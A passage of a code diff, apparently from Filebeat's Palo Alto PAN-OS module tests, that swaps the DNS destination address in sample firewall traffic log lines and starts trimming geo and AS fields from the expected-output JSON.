+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
@@ -91,10 +91,10 @@ Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
index 7e2a55dd0f08..fa7fb92877c2 100644
--- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json
@@ -8,14 +8,7 @@
         "client.packets": 16,
         "client.port": 55113,
         "destination.address": "184.51.253.152",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 5976,
-        "destination.geo.continent_name": "North America",
